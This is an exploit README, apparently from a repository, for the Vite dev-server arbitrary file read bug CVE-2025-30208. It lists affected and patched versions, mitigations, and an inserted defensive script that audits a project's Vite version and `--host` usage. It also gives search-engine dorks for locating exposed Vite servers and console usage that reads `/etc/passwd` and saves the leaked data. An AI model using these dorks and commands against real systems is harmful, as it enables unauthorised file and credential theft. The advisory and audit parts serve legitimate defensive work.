## https://sploitus.com/exploit?id=A75E1BF9-2725-580E-A06B-0892E211AEB1
# CVE-2025-30208

---
> **CVE-2025-30208**: Vite Arbitrary File Read Vulnerability
---
### Finding Targets
To find potential targets, use Fofa (similar to Shodan.io):
- Fofa dork: `app="Vite-App"`
- Shodan.io: `app="Vite"`
- hunter.how: `product.name="Vite"`
## Table of Contents
- [Overview](#overview)
- [Impact](#impact)
- [Affected Versions](#affected-versions)
- [Patched Versions](#patched-versions)
- [How to Test](#how-to-test)
- [Example Usage](#example-usage)
- [Mitigation](#mitigation)
- [References](#references)
---
## Overview
**CVE-2025-30208** is an **Arbitrary File Read** vulnerability in multiple versions of the Vite Development Server. Remote attackers can read any file on the server by sending specially crafted HTTP requests, if the Vite dev server is exposed to the network (e.g., using `--host` or configuring `server.host`).
> **Type:** Arbitrary File Read
> **CVE:** CVE-2025-30208
> **Component:** Vite Dev Server
---
## Impact
- Read sensitive files such as `/etc/passwd`, `.env`, source code, or configuration files.
- May lead to credential theft, information disclosure, or further attacks.
---
## Affected Versions
```
6.2.0 <= Vite <= 6.2.2
6.1.0 <= Vite <= 6.1.1
6.0.0 <= Vite <= 6.0.11
5.0.0 <= Vite <= 5.4.14
Vite <= 4.5.9
```
> **Note:** Exploitable only if the Vite dev server is accessible from the network (e.g., started with `vite --host`).
---
## Patched Versions
```
Vite >= 6.2.3
6.1.2 <= Vite < 6.2.0
6.0.12 <= Vite < 6.1.0
5.4.15 <= Vite < 6.0.0
4.5.10 <= Vite < 5.0.0
```
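The two tables above are easiest to act on as a check against the Vite version a project actually has installed. The following script is an added example, not part of this repository: it encodes the Affected Versions ranges exactly as listed, reads the installed version from `node_modules/vite/package.json` (the standard npm layout, assumed here), and additionally flags npm scripts that start `vite` with `--host`, since the note above says the bug is only reachable when the dev server is exposed that way. `server.host` set inside `vite.config.*` is not parsed.

```python
"""Audit a project for CVE-2025-30208 exposure using the ranges in this README.

Added example, not the repository's own script. The vulnerable ranges are
copied from the Affected Versions table above; the package.json layout assumed
here (node_modules/vite/package.json, "scripts" entries) is the standard npm one.
"""
import json
import re
from pathlib import Path

# (lower bound, upper bound), both inclusive, for each affected range.
# A lower bound of None means "every version up to the upper bound".
VULNERABLE_RANGES = [
    ((6, 2, 0), (6, 2, 2)),
    ((6, 1, 0), (6, 1, 1)),
    ((6, 0, 0), (6, 0, 11)),
    ((5, 0, 0), (5, 4, 14)),
    (None, (4, 5, 9)),
]

_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Return (major, minor, patch) for strings like '6.2.3' or 'v6.2.3-beta.1'.

    Prerelease and build suffixes are dropped, so a prerelease is judged as its
    base release; for a vulnerability check that errs on the side of flagging.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(part) for part in m.groups())


def is_vulnerable(version):
    """True if the version lies inside any range of the Affected Versions table."""
    v = parse_version(version)
    return any((low is None or low <= v) and v <= high
               for low, high in VULNERABLE_RANGES)


def scripts_exposing_host(package_json_text):
    """Names of npm scripts that start vite with --host (network exposure).

    Heuristic: only the --host flag on a command mentioning vite is checked;
    server.host set in vite.config.* is not parsed here.
    """
    scripts = json.loads(package_json_text).get("scripts", {})
    return sorted(
        name for name, cmd in scripts.items()
        if re.search(r"\bvite\b", cmd) and re.search(r"(^|\s)--host(\s|=|$)", cmd)
    )


def installed_vite_version(project_dir):
    """Read the installed Vite version from node_modules/vite/package.json."""
    pkg = Path(project_dir) / "node_modules" / "vite" / "package.json"
    with pkg.open(encoding="utf-8") as fh:
        return json.load(fh)["version"]


# Constructed sample package.json: one script exposes the dev server, two do not.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "demo-app",
    "scripts": {
        "dev": "vite",
        "dev:lan": "vite --host 0.0.0.0 --port 5173",
        "build": "vite build",
    },
})


if __name__ == "__main__":
    import sys
    project = sys.argv[1] if len(sys.argv) > 1 else "."
    version = installed_vite_version(project)
    state = "VULNERABLE" if is_vulnerable(version) else "patched"
    print(f"vite {version}: {state}")
    with open(Path(project) / "package.json", encoding="utf-8") as fh:
        for name in scripts_exposing_host(fh.read()):
            print(f"script '{name}' starts vite with --host (network exposed)")
```

Run it from a project root (`python3 vite_audit.py .`); a version inside an affected range prints `VULNERABLE`, and any script passing `--host` is listed so it can be reviewed against the mitigation advice below.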
---
## How to Test
This repository provides a script (`CVE-2025-30208.py`) to test if a target Vite server is vulnerable.
### 1. Install Dependencies
```bash
pip3 install -r requirements.txt
```
### 2. Run the Script
```bash
python3 CVE-2025-30208.py
```
### 3. Set Target Options
- `set RHOST <target IP or domain>`
- `set RPORT <Vite dev server port>`
- `set COMMAND <file path to read, e.g., etc/passwd>`
### 4. Run the Exploit
- Use the `run` or `exploit` command to test the target.
- If vulnerable content is found, use the `pull` command to save the leaked data as HTML or JSON.
---
## Example Usage
```shell
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 5173
CVE-2025-30208 > set COMMAND etc/passwd
CVE-2025-30208 > run
CVE-2025-30208 > pull
```
---
## Mitigation
- **Upgrade** Vite to a patched version as listed above.
- **Do not expose** the Vite dev server to public or untrusted networks.
- **Restrict access** using firewalls or reverse proxies.
---
## Disclaimer
This project is created for educational and research purposes only. The author is not responsible for any misuse of this tool or information provided herein.
Using this software against systems without explicit permission is illegal and strictly prohibited. Always ensure you have written authorization before performing any security testing.
By using this repository, you agree to comply with all applicable local, state, national, and international laws.
## References
- [Vite Official Repository](https://github.com/vitejs/vite)
- [National Vulnerability Database (NVD)](https://nvd.nist.gov/)
- [GitHub Advisory Database](https://github.com/advisories)